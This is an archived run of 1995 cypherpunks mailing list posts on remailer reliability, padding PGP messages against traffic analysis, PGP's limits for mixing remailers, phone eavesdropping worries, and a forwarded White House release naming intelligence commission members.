To: nobody@myriad.pc.cc.cmu.edu (Anonymous) (Anonymous)
Subject: Re: Remailer Unreliability
In-Reply-To: <m0raAVp-000vl1C@myriad.pc.cc.cmu.edu>
Message-ID: <199502030236.VAA22498@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What if it was possible to specify an alternate remailer?  In the case that
> a remailer went down, you could specify an alternate.  For example:
> 
[ Snip! ]
> 
> If foo.com was down, the message would be delivered to bar.com instead.
> The PGP message would have to be readable to both of them, so it would
> decrease security, but reliability would be better, especially for
> reply blocks.  Comments?
> 
Hmmm. Not as secure, but how about this... (a kind of script)

begin A
  if active(mailer@foo.com) mail(mailer@foo.com,B,C)
  elseif active(mailer@bar.com) mail(mailer@bar.com,B,C)
end

begin B
 { next block of scripts for chain... remailer would encrypt B and C
 blocks for appropriate mailer }
end

begin C
 { this block would be cargo... could even contain multiple messages? }
end

That's a pseudoscript, but you get the idea... (no pun intended ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordyn@alinc.com (Jordyn A Buchanan)
Date: Thu, 2 Feb 95 21:11:34 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
Message-ID: <ab57699300021004facc@[204.99.128.203]>
MIME-Version: 1.0
Content-Type: text/plain


>> Date: Thu, 2 Feb 95 18:00 EST
>> From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
>>
>> What if it was possible to specify an alternate remailer?  In the case that
>> a remailer went down, you could specify an alternate.  For example:
>
>  Well, *I* think it is a good idea.  But how does remailer1 know that
>remailer2 is both a remailer and down?

The issue of whether or not the alternate address is a remailer seems to
be largely irrelevant.  It doesn't really hurt anyone to be able to specify
an alternate address, and the feature would even seem to have some practical
value as you could specify alternate addresses for an end-recipient if
you suspect an address might be unreliable.

As long as the alternate address is only invoked if the first mail delivery
fails, the problem of the exponentially-growing message is avoided as well.

Jordyn

-------------------------------------------------------------------------
Jordyn A. Buchanan                      Environmental Studies (B.U.S.)
jordyn@alinc.com                        University of Utah -- '95 (hope)

PGP Public Key: 0xADEEC1 ED 3D 36 5A 98 CE 9D B4  4B 37 0B 9B B5 D6 F3 4B






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordyn@alinc.com (Jordyn A Buchanan)
Date: Thu, 2 Feb 95 21:16:56 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
Message-ID: <ab576c25020210049573@[204.99.128.201]>
MIME-Version: 1.0
Content-Type: text/plain


>> Date: Thu, 2 Feb 95 18:00 EST
>> From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
>>
>> What if it was possible to specify an alternate remailer?  In the case that
>> a remailer went down, you could specify an alternate.  For example:
>
>  Well, *I* think it is a good idea.  But how does remailer1 know that
>remailer2 is both a remailer and down?

The issue of whether or not the alternate address is a remailer seems to
be largely irrelevant.  It doesn't really hurt anyone to be able to specify
an alternate address, and the feature would even seem to have some practical
value as you could specify alternate addresses for an end-recipient if
you suspect an address might be unreliable.

As long as the alternate address is only invoked if the first mail delivery
fails, the problem of the exponentially-growing message is avoided as well.

Jordyn

-------------------------------------------------------------------------
Jordyn A. Buchanan                      Environmental Studies (B.U.S.)
jordyn@alinc.com                        University of Utah -- '95 (hope)

PGP Public Key: 0xADEEC1 ED 3D 36 5A 98 CE 9D B4  4B 37 0B 9B B5 D6 F3 4B






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Thu, 2 Feb 95 20:47:02 PST
To: cypherpunks@toad.com
Subject: Re: Adding padding to PGP files
In-Reply-To: <199502021648.IAA05417@jobe.shell.portal.com>
Message-ID: <199502030438.WAA09561@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Thu, 2 Feb 1995 08:48:49 -0800
> From: Hal <hfinney@shell.portal.com>
> 
> It only works on binary ".pgp" public-key encrypted files (not ascii armored
> files).  So there would be some work needed to make it a really useful tool.
> 
> Hal

  I just tried adding random characters at the end of a pgp ascii
armoured message.  I had to cut out the checksum, but pgp was able to
decrypt the message just fine.  So a very simple program (ideally with
a strong source of random numbers) should be able to pad ascii
armoured files.

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Thu, 2 Feb 95 20:16:54 PST
To: cypherpunks@toad.com
Subject: 1995-02-02 President Names Members to Intelligence Commission (fwd)
Message-ID: <Pine.BSI.3.91.950202231722.8718A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain


[Thought Intelligence would be something of interest to the list... ]
[Note the sneaking in of Zoe Baird (umm... can you say favor?)      ]
[...................................................................]

---------- Forwarded message ----------
Date: Thu, 2 Feb 1995 18:53-0500
From: The White House <Publications-Admin@WhiteHouse.Gov>
To: Public-Distribution@CLINTON.AI.MIT.EDU
Subject: 1995-02-02 President Names Members to Intelligence Commission




                            THE WHITE HOUSE

                     Office of the Press Secretary

________________________________________________________________________
For Immediate Release					February 2, 1995


      STATEMENT BY THE PRESIDENT NAMING MEMBERS OF THE COMMISSION
    ON THE ROLES AND CAPABILITIES OF THE U.S. INTELLIGENCE COMMUNITY


     I am announcing today appointments to the Congressionally- mandated
Commission on the Roles and Capabilities of the United States
Intelligence Community.  The Commission will be chaired by the current
chairman of my Foreign Intelligence Advisory Board, Les Aspin.  Former
Senator Warren Rudman will serve as the vice chairman and I have asked
General Lew Allen, Jr., Zoe Baird, Ann Caracristi, Stephen Friedman,
Anthony S. Harrington, Robert J. Hermann, and Ambassador Paul Wolfowitz
to serve as well.

     These distinguished Americans will join the eight members appointed
by the leadership of the 103rd Congress.  They are Tony Coelho, David
Dewhurst, Representative Norm Dicks, Senator James Exon, former Senator
Wyche Fowler, Representative Porter Goss, General Robert Pursley and
Senator John Warner.

     Intelligence remains a critical element of our national power and
influence.  For over 40 years bipartisan support for the work performed
by U.S.  intelligence has been essential to the creation of an
intelligence capability that is second to none.  While the world has
changed in dramatic ways, our need to retain the advantage that U.S.
intelligence provides our country remains constant.

     With the end of the Cold War we must renew and reinvigorate this
bipartisan support.  The foundation for this support must begin with a
thorough assessment of the kind of intelligence community we will need
to address the security challenges of the future.  Our objective is to
strengthen U.S. intelligence, to ensure it has the management, skills
and resources needed to successfully pursue our national security
interests through the next decade and beyond.  It is an effort to which
I attach the highest personal priority.

     I am confident that Les Aspin, Warren Rudman and the other
outstanding members of this Commission will work cooperatively with the
leadership of the intelligence community and the Congress to ensure
continued bipartisan support for this critical mission.  And I know that
their effort will ensure the continued trust of the American people in
the outstanding and often unheralded work performed by the men and women
of U.S. intelligence.

# # #

Attachment:
     Biographic Information





	      THE COMMISSION ON THE ROLES AND CAPABILITIES
	      OF THE UNITED STATES INTELLIGENCE COMMUNITY
                            
                            

		   Members Appointed by the President 


Honorable Les Aspin, Chairman.  Mr. Aspin, of Milwaukee, Wisconsin, is a
Distinguished Professor of International Policy at Marquette University
and a Counsel at the Center for Strategic and International Studies.  He
served as Secretary of Defense from 1993 to 1994.  As the US
Representative from Wisconsin's 1st District, his congressional career
spanned twenty two years.  He was Chairman of the House Armed Services
Committee from 1985 to 1993.  Prior to his election to the US Congress
in 1970, Mr. Aspin was a staff assistant to the chairman of President
Kennedy's Council of Economic Advisors.  He also serves as Chairman of
the President's Foreign Intelligence Advisory Board (PFIAB).
  
Warren B. Rudman, Vice Chairman.  Senator Rudman, of Washington, DC and
Manchester, New Hampshire, is a partner in the Washington law firm of
Paul, Weiss, Rifkind, Wharton & Garrison.  He served as a U.S.
Senator from 1980 to 1992, where he was a member of the Select
Committee on Intelligence.  He previously was Attorney General of the
State of New Hampshire.  He also serves as Vice Chairman of the PFIAB.

General Lew Allen, Jr., USAF (Ret.).  General Allen, of Pasadena,
California, served as Chief of Staff of the Air Force and Director of
the National Security Agency.  He retired in 1991 as a Vice President
of the California Institute of Technology and Director of the Jet
Propulsion Laboratory.  He was a member of President Bush's PFIAB and
is a current PFIAB member.

Zoe Baird.  Ms. Baird, of Hartford, Connecticut, is Senior Vice
President and General Counsel of the Aetna Life & Casualty company.
She is a former counselor and senior staff executive of the General
Electric Corporation, a former partner in the Washington, DC law firm
of O'Melveny & Myers, and a former Associate Counsel to President
Carter.

Ann Caracristi.  Miss Caracristi, of Washington, DC, is a former Deputy
Director of the National Security Agency, where she served in a variety
of senior management positions over a 40 year career.  She recently
chaired a DCI Task Force on intelligence training and is a member of
the DCI/Secretary of Defense Joint Security Commission.  She is a
current PFIAB member.

Stephen Friedman.  Mr. Friedman, of New York City, is Senior Chairman
and Limited Partner of Goldman, Sachs & Co., which he originally joined
in 1966.  He served as Chairman and Senior Partner from December 1992
to November 1994 when he retired from active management of the firm.

Anthony S. Harrington.  Mr. Harrington, of Washington, DC, is a partner
in the law firm of Hogan & Hartson.  He is a former General Counsel to
the Democratic National Committee, the former General Counsel to the
Clinton/Gore Campaign, a founding Director of the Center for Democracy,
and a former Assistant Dean of the Duke Law School.   He is a current
PFIAB member.

Robert J. Hermann.  Dr. Hermann, of Hartford, Connecticut, is the
Senior Vice President for Science and Technology of the United
Technologies Corporation.  He is a former Director of the Defense
Department's National Reconnaissance Office and a former senior
official at the National Security Agency.  He is a current PFIAB
member.

Paul D. Wolfowitz.  Dr. Wolfowitz, of Chevy Chase, Maryland, is the
dean of the Paul H. Nitze School of Advanced International Studies at
The Johns Hopkins University.  He served as Under Secretary of Defense
for Policy from 1989 to 1993 and has held a variety of positions in
government beginning in 1966.


             Members Appointed By Congress

Honorable Tony Coelho.  Mr. Coelho is President and CEO of Wertheim
Schroder Investment Services, Incorporated, and a Managing Director of
Wertheim Schroder & Co, Inc.  He a former US Representative from
California and a former Majority Whip of the US House of
Representatives.

David H. Dewhurst.  Mr. Dewhurst is Founder, Chairman, and CEO of
Falcon Seaboard Resources, Inc., a Houston- based, integrated energy
company.  He served as a Case Officer with the Central Intelligence
Agency in the early 1970s, and was recently elected to the National
Board of Directors of the Jewish Institute for National Security
Affairs.  Mr. Dewhurst served as Chairman of the Texas Product
Development Advisory Board.

Representative Norman D. Dicks.  Mr. Dicks, of Washington, was first
elected to the House in 1976.  He has served on the Appropriations
Committee since his freshman term, and currently sits on three
subcommittees -- Defense, Interior and Military Construction. He
currently is the ranking minority member of the Select Committee on
Intelligence.  Mr.  Dicks also was an Administrative Assistant to
Senator Warren Magnuson from 1973 to 1976.

Senator J. James Exon.   Senator Exon, of Nebraska, was elected to his
first term in 1978.  He currently is a member of the Armed Services
Committee (where he chairs the Subcommittee on Nuclear Deterrence, Arms
Control & Defense Intelligence), the Committee on Commerce, Science &
Technology and the Budget Committee.  He is a former two-term Governor
of Nebraska, and a World War Two veteran of the US Army Signal Corps.

Honorable Wyche Fowler.  Mr. Fowler is a partner in the law firm of
Powell, Goldstein, Frazer & Murphy.  He served 16 years in the US
Congress.  Elected to the Senate in 1986, he was Assistant Floor Leader
and was a member of the Appropriations, Budget, Energy and
Agricultural Committees.  During his nine years in the House, he served
on the Select Committee on Intelligence and the Foreign Relations and
Ways and Means Committees.

Representative Porter J. Goss.  Mr. Goss, of Florida, was first elected
to the House in 1988.  He currently is a member of the Select Committee
on Intelligence, the Ethics Committee and the Rules Committee, where he
chairs the Subcommittee on the Legislative Process.  He is a former
Clandestine Service Officer with the Central Intelligence Agency, where
he served for ten years.  Mr. Goss is a former Councilman of Sanibel,
Florida, where he also was elected the city's first mayor.

Lt. Gen. Robert E. Pursley, USAF (Ret.)  General Pursley is President
of the Logistics Management Institute, and a former Vice Chairman of
USAA, a private financial service company, and a former Executive Vice
President of Insilco Corporation.  In twenty five years of military
service, he served as Military Assistant to Secretaries of Defense
Laird, Clifford and McNamara, and was Commander of US Forces Japan and
the Fifth Air Force.

Senator John Warner.  Senator Warner, of Virginia, was elected to his
seat in 1978.  He is the second most senior member of the Senate Armed
Services Committee and the Environment and Public Works Committee.  He
served as Vice Chairman of the Senate Select Committee on Intelligence
from 1992 to 1994.  He also is a former Secretary and Undersecretary of
the Navy.  Senator Warner sponsored the legislation creating this
commission.


# # #








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 2 Feb 95 22:31:34 PST
To: cypherpunks@toad.com
Subject: A simple idea
Message-ID: <Pine.SUN.3.91.950203012421.8112A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain



Maybe this has been discussed before, but if so I wasn't around for it 
and would like to know:

What if: (assuming trusted remailers, but still worried about traffic 
analysis of those remailers):

One mailed a message to one remailer. This remailer held onto all 
messages until some predestined hour or kilobyte size or whatever, and 
then forwarded ALL its messages to this other remailer, in one packet 
(.TARred and PGPed separately, say), but NOT IN THE ORDER RECIEVED?

While this wouldn't solve all the problems (to some extent, the sizes of 
files might be correlated, but this could probably be foiled by other 
means), wouldn't it at least foil the easy to/from traffic analysis that 
is (I believe) the greatest threat?

Jon
==============================================================================
                     Jon Lasser <jlasser@goucher.edu>
This is an advanced .signature virus -- please attach to your .signature and
add your last initial to the list: l
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Thu, 2 Feb 95 23:01:25 PST
To: Gary Jeffers <CCGARY@MIZZOU1.missouri.edu>
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
In-Reply-To: <199502022357.SAA28764@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950203015859.20431A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 Feb 1995, Gary Jeffers wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
>          THE FIREWALL CHIP!  U'RE PHONE ALWAYS OFFHOOK?
> 
>    We have potential bugging devices in all our houses - The telephone!
> Of course, when it is onhook, the microphone does not transmit... or
> does it? Would the phone have to be rewired to render it always
> "offhook" or would it be an operation at the central phone company?
> If the present models would have to be rewired, then how about future
> models? Much function is done thru chips & so could many of the models
> on the current market be remote programmable? See the latest issue of
> Mondo 2000.

Use an encrypted cordless phone.  When its not in use, take the battery 
out of the phone.  As long as the model you own doens't have a speaker 
phone you're cool.

If you start thinking that all phones that you buy have other hidden 
mikes in them, then I start wondering about paranoia.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 3 Feb 95 00:20:26 PST
To: Nobody@eniac.ac.siue.edu (Anonymous)
Subject: Re: Adding padding to PGP files
In-Reply-To: <199502030438.WAA09561@eniac.ac.siue.edu>
Message-ID: <199502030820.DAA07843@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Date: Thu, 2 Feb 1995 08:48:49 -0800
> > From: Hal <hfinney@shell.portal.com>
> > 
> > It only works on binary ".pgp" public-key encrypted files (not ascii armored
> > files).  So there would be some work needed to make it a really useful tool.
> > 
> > Hal
> 
>   I just tried adding random characters at the end of a pgp ascii
> armoured message.  I had to cut out the checksum, but pgp was able to
> decrypt the message just fine.  So a very simple program (ideally with
> a strong source of random numbers) should be able to pad ascii
> armoured files.

Probably can calculate a new checksum too... or binary PGP, add junk
and mime/uu/xx-encode....?

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Anonymous)
Date: Fri, 3 Feb 95 07:16:12 PST
To: cypherpunks@toad.com
Subject: Re: Why encrypt intra-remailernet.
In-Reply-To: <Pine.3.89.9502022036.D23979-0100000@vern.bga.com>
Message-ID: <199502031504.HAA15462@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook <nzook@bga.com> wrote:
> Was this Detweiller's "exponentially growing message"?

Yes.

> Note that requiring pgp wrappers kills this...

No, just encrypt to multiple recipients.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brett Turcotte" <turcotte@io.com>
Date: Fri, 3 Feb 95 10:02:45 PST
To: cypherpunks@toad.com
Subject: Re: 1995-02-02 President Names Members to Intelligence Commissi
Message-ID: <199502031802.MAA20515@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


<much snippage of press release naming commission members>
> 
> Attachment:
>      Biographic Information
> 
> 
> 
> 
> 
> 	      THE COMMISSION ON THE ROLES AND CAPABILITIES
> 	      OF THE UNITED STATES INTELLIGENCE COMMUNITY
>                             
<more snippage of bio information>

Anyone else notice all of the inside the beltway plus NYC area types 
on this list....anyone want to bet on how much "newly required" 
intelligence capabilities will come out of this commission...

Brett Turcotte
turcotte@io.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Fri, 3 Feb 95 09:12:52 PST
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <9501037918.AA791831560@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     THE NEW ETHOS OF THE NET
     A professor at St. Cloud University in Minnesota calls for overhauling 
     business school curricula to stress ethical concerns in the electronic 
     age the same way they stress finance or economic theory. The end 
     result? "Information systems will be protected because most people 
     will no longer be willing to purposefully contaminate a program or 
     network; they will protect others' confidentiality, privacy, and 
     copyright as they protect their own; they will refuse to plagiarize, 
     fabricate, and perpetrate other types of fraud; and they will not 
     tolerate such activities in others." The alternative is bleak: "...We 
     will degenerate into secretive, encrypted, overly protective 
     information hoarders, unwilling to share and disseminate knowledge -- 
     except for profit." (Information Week 2/6/95 p.64) 
     
     But, how do you really feel...
     John

John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@earthlink.net        you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peb@netcom.com (Paul E. Baclace)
Date: Fri, 3 Feb 95 09:28:27 PST
To: sandfort@crl.com
Subject: Re:  THROUGH THE LOOKING GLASS
Message-ID: <199502031709.JAA20821@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently a relative of mine was battered/assulted in a park.  The
perp, after a personal item broke, called a friend at the police on 
his cel phone and an officer charged my relative for assault! The 
perp is also trying to sue for damages.  The relative is nearly at 
retirement age and the perp had 3 large attack dogs at the time.
This is a bad cop with a vindictive mentality and the court so far 
believes the cop. (My relative should be suing for psychological damages
after weeks of nightmares about being attacked and then betrayed
by the police and fear of retribution for pursuing justice.  This
is a very expensive process in money, time and emotions.)

A personal recording of what happened would make a lot of difference.

Paul E. Baclace
peb@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 3 Feb 95 09:15:23 PST
To: cypherpunks@toad.com
Subject: to hfinney
Message-ID: <199502031714.JAA01901@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


mr finney , do you know if that perl prog of yours to add stuff to .pgp
files can be ported to messy dos ?
many thanx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 3 Feb 95 07:26:27 PST
To: hfinney@shell.portal.com>
Subject: Re: Remailing in safe-tcl
In-Reply-To: <5122.791772273.1@nsb.fv.com>
Message-ID: <MjAYfK70Eyt5AxSd8B@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 2-Feb-95 Remailing in safe-tcl Hal@shell.portal.com (2397)

> I don't see any straightforward way for a script to suspend itself and
> re-activate on some future event (such as the arrival of another
> message).  Maybe it could put its whole self into the config database as
> a {key, value} pair and rely on future messages to pull it out and
> execute it.  But that doesn't seem too great.

The problem is that this is a very hard -- perhaps impossible -- thing
to build in at the level of a safe-tcl interpreter, because the safe-tcl
interpreter is supposed to be a relatively stand-alone thing.  To
activate something based on a future event requires some hooks into
external event management -- e.g. a cron job, or the message receipt
facilities of a specific mail tool, etc.   The challenge, I think, is to
figure out how to make sure safe-tcl has the right hooks for such an
external environment without REQUIRING one particular such environment
in order to run safe-tcl.

In other words, I think the best to be hoped for is for safe-tcl to have
the facilities that are needed by such an environment.  I'm not entirely
sure what those facilities are, but I'm optimistic that this could be
layered on using the "declareharmless" mechanism of safe-tcl.  Thus, you
could write (in full tcl) a procedure that essentially queues an event
for future processing, and make that procedure available to the safe-tcl
environment.  Is this plausible in your application context?

> There is a lot of interest in this notion of mail messages as scripted
> agents which go zipping about the network gathering data which they send
> home.  I am optimistic that we will be able to get remailing capabilities
> out of this infrastructure largely for free.

I think there's a good chance of that, yes.  Part of the safe-tcl
experiment, actually, is the attempt to figure out, cooperatively, what
all is needed in the way of infrastructure.  So what I'm most interested
in knowing is whether there are features you can imagine adding to
safe-tcl that would make this easier to do on your end...  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 3 Feb 95 10:33:32 PST
To: cypherpunks@toad.com
Subject: Re:  to hfinney
Message-ID: <199502031832.KAA10617@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: anonymous-remailer@shell.portal.com
> mr finney , do you know if that perl prog of yours to add stuff to .pgp
> files can be ported to messy dos ?
> many thanx

Perl does exist for ms-dos, and I think those scripts would probably work
OK there.  They don't do anything exotic, just some byte reads and
writes.  Maybe the random-number generation would need to be looked at;
as I said, that is the one weak part.  But probably they would work OK.
 
Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 3 Feb 95 10:46:48 PST
To: Dale Harrison <daleh@ix.netcom.com>
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
In-Reply-To: <199502030441.UAA17143@ix2.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950203103828.3246E-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 2 Feb 1995, Dale Harrison wrote:

> . . .
> Actually, there is a germ of truth in this.  On older phones (don't know if 
> this works on newer electronic phones) when the handset is 'on-hook' a 
> switch opens and breaks the voice circuit.  This of course only works for 
> DC circuits.  If you drive that same circuit with an AC signal . . .

There's another angle I may have mentioned before.  Many 
electronic phones come with a ``feature'' that allows you to 
call home, produce an electronic tone and eavesdrop on your own
house.  When the tone is sounded, the ringing stops (or never
starts) and the phone goes into ``off hook'' mode (i.e., the
microphone in the mouthpiece is turned on).

Even if you did not buy this feature when you bought your phone,
it is still there, just waiting for that electronic tone.  You 
can't produce it, because you didn't buy the doohickey, but anyone
with such a doohickey can call your house and listen in. . .


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 3 Feb 95 11:42:27 PST
To: cypherpunks@toad.com
Subject: re to hfinney
Message-ID: <199502031941.LAA18023@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


hal sez:

: Perl does exist for ms-dos, and I think those scripts would probably work
: OK there.  They don't do anything exotic, just some byte reads and
: writes.  Maybe the random-number generation would need to be looked at;
: as I said, that is the one weak part. But probably they would work OK.

kool . could you please repost the scripts , i seem to have misplaced them.
also , where can i get perl for dos , any idea ? tia .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 3 Feb 95 11:52:36 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <9502030123.AA02022@josquin.media.mit.edu>
Message-ID: <199502031942.LAA15031@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Derek Atkins <warlord@MIT.EDU>

   > I agree.  PGP just does not have the support for the encryption
   > required for mixing remailers.

   How
   is PGP deficient?  What do you need PGP to do in order to get it to
   work right with remailers?

Note that I said mixing remailers, not just regular remailers.

-- No support for random padding to a fixed length.  Yes, this can be
patched by script.  Hell, you could rewrite PGP with a script, so the
existence of a workaround is no defense.

-- Message size blowup for encrypted armor-within-armor.  Yes, I know
it compresses, but it would be a better thing to get PGP to unpack a
PGP encrypted message (the message to the next hop) to multipart form,
part regular text, part armored.

-- Inability to restrict PGP from accepting a non-encrypted message.
PGP run on an armored plaintext file will work just as if it were
encrypted.  This precludes being able to require encryption as a site
policy.  (Again this can probably be worked around; again, not an
excuse.)

In addition, there's a few really bad misfeatures for pseudonymity
(which is what everyone seems to want to do with remailers):

-- Identities for secret keys are in cleartext in the secret key ring.
Upon seizure of a secret key ring, presence of a pseudonym name can be
considered a presumption of possession of a corresponding secret key,
simply because people don't fill up their secret key rings with bogus
keys with other people's names.

-- Key ID of the recipient is always in the clear.

-- The RSA-encrypted session key does not have a flat representation
over its multiword container.  This yields a statistical traffic
analysis hole.  (This point is irrelevant without fixing 4.)  Hal and
I completely solved this problem last year.


This is all I can think of off the top of my head.  Not having
analyzed the problem recently, I can't say that I've got everything.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
Date: Fri, 3 Feb 95 08:50:25 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
Message-ID: <m0raRHW-0006WvC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: anonymous-remailer@shell.portal.com
>  Well, *I* think it is a good idea.  But how does remailer1 know that
>remailer2 is both a remailer and down?

By attempting a connection to the SMTP port and using the alternate if
it fails?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 3 Feb 95 10:24:21 PST
To: "Paul E. Baclace" <peb@netcom.com>
Subject: Re: THROUGH THE LOOKING GLASS
In-Reply-To: <199502031709.JAA20821@netcom20.netcom.com>
Message-ID: <Pine.SOL.3.90.950203131758.22196B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


There really is a CP thread here.  

After you've had one of these experiences, you will not trust
authority any more.

I can't wait for the "good faith" exeception to the 4th amendment
to hit the streets.

bd


On Fri, 3 Feb 1995, Paul E. Baclace wrote:

> Recently a relative of mine was battered/assulted in a park.  The
> perp, after a personal item broke, called a friend at the police on 
> his cel phone and an officer charged my relative for assault! The 
> perp is also trying to sue for damages.  The relative is nearly at 
> retirement age and the perp had 3 large attack dogs at the time.
> This is a bad cop with a vindictive mentality and the court so far 
> believes the cop. (My relative should be suing for psychological damages
> after weeks of nightmares about being attacked and then betrayed
> by the police and fear of retribution for pursuing justice.  This
> is a very expensive process in money, time and emotions.)
> 
> A personal recording of what happened would make a lot of difference.
> 
> Paul E. Baclace
> peb@netcom.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 3 Feb 95 14:29:55 PST
To: cypherpunks@toad.com
Subject: Remailer Unreliability
Message-ID: <199502032132.AA09239@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

>>  Well, *I* think it is a good idea.  But how does remailer1 know that
>>remailer2 is both a remailer and down?
>
>By attempting a connection to the SMTP port and using the alternate if
>it fails?

This depends on a significant change in remailer features - existing
remailers don't do message delivery, they pass remailed messages off 
to the local MTA (e.g, sendmail, Smail, whatever) and let it take
care of delivery. Expecting remailers to handle queueing and delivery
adds lots of code and complexity. (It also may piss off sysadmins who
aren't remailer operators. Bogus or not, some institutions frown on
attempting mail delivery manually or with non-standard programs.)

Also, it's difficult to say when delivery has failed. Not every failure
(where failure = not delivered in a reasonable time) results in a
bounce message; if the sending remailer can't determine success or
failure immediately, it will have to keep a database of the last few
(hundred, probably) primary/alternate address pairs, and then 
extract the failed message from the bounce message, then reprocess 
with the alternate address. Yuck. 

I think the easiest way to do this would be for remailers to have a
list of "unavailable remailers", and to process the primary/alternate
choice immediately upon receipt/resending - but if we have a good way
to provide the remailers with availability information, we've probably
found a good way to provide it to users, too.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzKgyH3YhjZY3fMNAQHlkwP7Bj5D5PbC1H+x3XXqP3gdUTTL6eLMjt2d
6cmj/kr0nv88XwXkIttj7r4wSDRXSe8K4mpU4utNQ1l+RlArDzZLkiY/qleuRhGX
yRplXo6eoNwSv24oBCIVwdu7r+gnlhVs4sU3tzkWD+deOQxVXffdPL0opZ1Cn8v6
qRmKmuOYFB8=
=i/8j
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 3 Feb 95 13:58:56 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: Lucky primes & omlets on my face...
In-Reply-To: <199502020213.SAA17094@jobe.shell.portal.com>
Message-ID: <9502032157.AA04050@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Recall:  x^p = x mod p therefore, x^(p-1) = 1 mod p. So what we need is:
> > (x^e)^d = x^ed = x^(p-1)*i+1 = x mod p.  
> 
> This would only be true for prime p, but with RSA we are dealing with
> composite moduli.  What we want is ed=1 mod phi(n), where
